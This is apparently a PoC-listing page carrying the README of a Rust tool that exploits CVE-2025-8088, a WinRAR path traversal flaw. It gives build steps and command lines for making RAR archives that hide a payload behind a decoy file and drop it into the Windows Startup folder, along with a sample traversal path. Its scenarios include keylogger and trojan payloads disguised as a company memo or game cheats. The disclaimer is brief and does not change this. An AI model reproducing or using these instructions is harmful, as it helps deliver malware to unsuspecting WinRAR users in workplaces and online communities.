CVE-2025-8088 PoC — Path traversal vulnerability in WinRAR

Source

Associated Vulnerability

Description

A high-performance, memory-safe implementation of the WinRAR CVE-2025-8088 exploit tool, rewritten in Rust for better reliability and performance.

Readme

# WinRAR Exploit Tool - Rust Edition

> **Advanced WinRAR Path Traversal Exploit Tool - Written in Rust**

A high-performance, memory-safe implementation of the WinRAR CVE-2025-8088 exploit tool, rewritten in Rust for better reliability and performance.



## Features

- **ADS Exploitation** - NTFS Alternate Data Streams for payload hiding
- **RAR5 Header Manipulation** - Direct header patching for path injection
- **Modern GUI** - Beautiful GTK-based interface with CSS styling
- **Startup Targeting** - Automatic payload placement in Windows startup
- **Custom Decoy Support** - Use your own decoy files or default
- **Universal File Support** - Supports any file type for both payload and decoy
- **Robust Error Handling** - Comprehensive error checking and diagnostics
- **System Diagnostics** - Automatic system compatibility checking
- **Memory Efficient** - Low memory footprint with smart resource management

## Requirements

- **Rust 1.70+** - Modern Rust toolchain
- **GTK Development Libraries** - For GUI support
- **WinRAR CLI** - For RAR archive creation
- **Windows 10/11** - NTFS support required

## Quick Start

### 1. Install Rust

```bash
# Install Rust using rustup


# Verify installation
rustc --version
cargo --version
```

### 2. Install GTK Development Libraries

#### Windows (MSVC)
```bash
# Using vcpkg
vcpkg install gtk:x64-windows
```

#### Or using MSYS2
```bash
pacman -S mingw-w64-x86_64-gtk4
```

### 3. Clone and Build

```bash
# Navigate to the rust project
cd winrar_exploit_rust

# Build in debug mode
cargo build

# Build optimized release
cargo build --release

# Run the application
cargo run --release
```

## Usage

1. **Select Payload** - Choose any file as payload (.exe, .bat, .jpg, .pdf, etc.)
2. **Choose Decoy** - Select any file as decoy (will create default if empty)
3. **Name Archive** - Enter output RAR filename
4. **Build** - Generate the exploit archive

## Examples

### Basic Usage

Create a simple exploit with a payload and decoy file:

```bash
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"
```

### Advanced Usage

#### Multiple Decoy Files
```bash
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"
```

#### Custom Drop Directory
```bash
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"
```

#### Different Payload Types
```bash
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"
```

### System Diagnostics

```bash
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose

# Show available tools and features
.\winrar_exploit_rust.exe tools
```

### Real-World Scenarios

#### Scenario 1: Corporate Environment
```bash
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"
```

#### Scenario 2: Gaming Community
```bash
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"
```



The tool creates RAR archives with path traversal using:

1. **ADS Creation** - Hides payload in NTFS alternate data streams
2. **RAR Building** - Creates base RAR with ADS using WinRAR CLI
3. **Header Patching** - Injects traversal path into RAR5 headers
4. **CRC Recalculation** - Ensures archive integrity
5. **Output** - Delivers malicious RAR ready for extraction

**Path Example**: `..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe`

## Supported File Types

### Payload Files:
- ✅ Executables (.exe, .bat, .cmd)
- ✅ Scripts (.py, .js, .vbs, .ps1)
- ✅ Documents (.pdf, .docx, .xlsx)
- ✅ Images (.jpg, .png, .gif)
- ✅ Videos (.mp4, .avi)
- ✅ Audio (.mp3, .wav)
- ✅ Any file type

### Decoy Files:
- ✅ Text files (.txt, .doc, .pdf)
- ✅ Images (.jpg, .png, .gif, .bmp)
- ✅ Videos (.mp4, .avi)
- ✅ Audio (.mp3, .wav)
- ✅ Documents (.docx, .xlsx)
- ✅ Any file type

## Architecture

```
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Application entry point
│   ├── gui.rs           # GTK-based user interface
│   ├── exploit.rs       # Core exploit logic
│   ├── ads.rs           # NTFS ADS manipulation
│   ├── rar.rs           # RAR5 header manipulation
│   ├── diagnostics.rs   # System diagnostics
│   └── error.rs         # Error handling
├── Cargo.toml           # Dependencies and build config
└── README.md           # This file
```


## Troubleshooting

The tool includes automatic diagnostics that check:

- ✅ WinRAR CLI installation
- ✅ NTFS ADS support
- ✅ Startup directory permissions
- ✅ GTK library availability
- ✅ File system compatibility

### Common Issues:

1. **"GTK not found"**
   ```bash
   # Install GTK development libraries
   # Windows (vcpkg)
   vcpkg install gtk:x64-windows

   # Or using MSYS2
   pacman -S mingw-w64-x86_64-gtk4
   ```

2. **"WinRAR CLI not found"**
   - Install WinRAR from https://www.winrar.com
   - Ensure `rar.exe` is in Program Files

3. **"Cannot write to startup directory"**
   - Run the tool as Administrator
   - Check folder permissions

4. **"NTFS ADS not supported"**
   - Ensure you're using NTFS file system
   - ADS is not supported on FAT32/exFAT

5. **Compilation Errors**
   ```bash
   # Update Rust toolchain
   rustup update

   # Clean and rebuild
   cargo clean
   cargo build --release
   ```

### Code Formatting

```bash
# Format code
cargo fmt

# Lint code
cargo clippy
```

### Dependencies

Key dependencies include:
- `gtk` - Modern GUI framework
- `tokio` - Async runtime
- `windows` - Windows API bindings
- `crc32fast` - Fast CRC32 calculation
- `byteorder` - Byte order manipulation
- `anyhow` - Error handling

## Security Considerations

- **Educational Purpose**: This tool is for authorized testing and educational purposes only
- **Controlled Environment**: Use only in controlled environments with proper consent
- **Legal Compliance**: Ensure compliance with applicable laws and regulations
- **Responsible Disclosure**: Follow responsible disclosure practices


## License

This project is licensed under the MIT License - see the LICENSE file for details.

## Author

**Made by [@kanonufo](https://t.me/kanonufo) on Telegram**

---

*High-performance red team tool for CVE-2025-8088 exploitation - Rust Edition*

File Snapshot

 [4.0K]  /data/pocs/fdc73c58caee660f47615d434c669d24874bdbea
├── [2.9K]  build.ps1
├── [ 32K]  Cargo.lock
├── [ 644]  Cargo.toml
├── [   4]  decoy.txt
├── [ 11K]  LICENSE
├── [7.2K]  README.md
├── [4.0K]  src
│   ├── [4.3K]  ads.rs
│   ├── [4.5K]  cli.rs
│   ├── [7.2K]  diagnostics.rs
│   ├── [1.1K]  error.rs
│   ├── [6.2K]  exploit.rs
│   ├── [ 12K]  gui.rs
│   ├── [2.0K]  main.rs
│   └── [8.3K]  rar.rs
├── [4.0K]  targer
│   ├── [ 177]  CACHEDIR.TAG
│   └── [4.0K]  debug
└── [4.0K]  target

4 directories, 15 files

Remarks